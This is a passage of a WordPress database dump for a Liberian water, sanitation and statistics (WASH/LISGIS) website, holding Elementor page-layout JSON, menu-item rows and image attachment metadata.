(NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16315,2463,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(16316,2464,'_menu_item_type','custom'),(16317,2464,'_menu_item_menu_item_parent','0'),(16318,2464,'_menu_item_object_id','2464'),(16319,2464,'_menu_item_object','custom'),(16320,2464,'_menu_item_target','_blank'),(16321,2464,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16322,2464,'_menu_item_xfn',''),(16323,2464,'_menu_item_url','https://wash-liberia.org/about/'),(16325,2464,'_menu_item_template',''),(16326,2464,'_menu_item_mega_template','0'),(16327,2464,'_menu_item_nolink',''),(16328,2464,'_menu_item_category_post',''),(16329,2464,'_menu_item_megamenu',''),(16330,2464,'_menu_item_megamenu_auto_width',''),(16331,2464,'_menu_item_megamenu_col',''),(16332,2464,'_menu_item_megamenu_heading',''),(16333,2464,'_menu_item_megamenu_widgetarea','0'),(16334,2464,'_menu_item_icon',''),(16335,2465,'_menu_item_type','custom'),(16336,2465,'_menu_item_menu_item_parent','0'),(16337,2465,'_menu_item_object_id','2465'),(16338,2465,'_menu_item_object','custom'),(16339,2465,'_menu_item_target','_blank'),(16340,2465,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16341,2465,'_menu_item_xfn',''),(16342,2465,'_menu_item_url','https://wash-liberia.org/raw-water-point-data/'),(16344,2465,'_menu_item_template',''),(16345,2465,'_menu_item_mega_template','0'),(16346,2465,'_menu_item_nolink',''),(16347,2465,'_menu_item_category_post',''),(16348,2465,'_menu_item_megamenu',''),(16349,2465,'_menu_item_megamenu_auto_width',''),(16350,2465,'_menu_item_megamenu_col',''),(16351,2465,'_menu_item_megamenu_heading',''),(16352,2465,'_menu_item_megamenu_widgetarea','0'),(16353,2465,'_menu_item_icon',''),(16354,2466,'_menu_item_type','custom'),(16355,2466,'_menu_item_menu_item_parent','0'),(16356,2466,'_menu_item_object_id','2466'),(16357,2466,'_menu_item_object','custom'),(16358,2466,'_menu_item_target','_blank'),(16359,2466,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16360,2466,'_menu_item_xfn',''),(16361,2466,'_menu_item_url','https://wash-liberia.org/map/'),(16363,2466,'_menu_item_template',''),(16364,2466,'_menu_item_mega_template','0'),(16365,2466,'_menu_item_nolink',''),(16366,2466,'_menu_item_category_post',''),(16367,2466,'_menu_item_megamenu',''),(16368,2466,'_menu_item_megamenu_auto_width',''),(16369,2466,'_menu_item_megamenu_col',''),(16370,2466,'_menu_item_megamenu_heading',''),(16371,2466,'_menu_item_megamenu_widgetarea','0'),(16372,2466,'_menu_item_icon',''),(16373,2464,'_elementor_controls_usage','a:0:{}'),(16374,2465,'_elementor_controls_usage','a:0:{}'),(16375,2466,'_elementor_controls_usage','a:0:{}'),(16376,2468,'_elementor_controls_usage','a:0:{}'),(16378,2468,'_ca_post_type','2457'),(16379,2467,'_edit_last','1'),(16380,2467,'_elementor_controls_usage','a:0:{}'),(16381,2467,'_ca_handle','0'),(16382,2467,'_ca_host','sidebar'),(16383,2467,'_ca_merge_pos','0'),(16384,2467,'_edit_lock','1573910829:1'),(16385,2469,'_wp_attached_file','2019/11/wash_liberia_logo.png'),(16386,2469,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:244;s:6:\"height\";i:236;s:4:\"file\";s:29:\"2019/11/wash_liberia_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"wash_liberia_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16387,2471,'_elementor_controls_usage','a:0:{}'),(16389,2471,'_ca_post_type','1544'),(16390,2470,'_edit_last','1'),(16391,2470,'_elementor_controls_usage','a:0:{}'),(16392,2470,'_ca_handle','0'),(16393,2470,'_ca_host','sidebar'),(16394,2470,'_ca_merge_pos','0'),(16395,2470,'_edit_lock','1646908392:42'),(16396,2472,'_wp_attached_file','2019/11/lisgis_logo.png'),(16397,2472,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:23:\"2019/11/lisgis_logo.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16399,2473,'_wp_attached_file','2019/11/featured_lisgis.jpg'),(16400,2473,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:27:\"2019/11/featured_lisgis.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"featured_lisgis-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"featured_lisgis-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"featured_lisgis-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573911968\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(16401,1544,'_thumbnail_id','2473'),(16402,2474,'_elementor_edit_mode','builder'),(16403,2474,'_elementor_template_type','wp-post'),(16404,2474,'_elementor_version','2.7.5'),(16405,2474,'_wp_page_template','default'),(16406,2474,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bad4608\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6428a1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"db45cc0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48f7b3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bef4576\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"762ba4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89dda08\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"867bd0f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16408,2474,'_thumbnail_id','2473'),(16410,2475,'_elementor_edit_mode','builder'),(16411,2475,'_elementor_template_type','wp-post'),(16412,2475,'_elementor_version','2.7.5'),(16413,2475,'_wp_page_template','default'),(16414,2475,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_l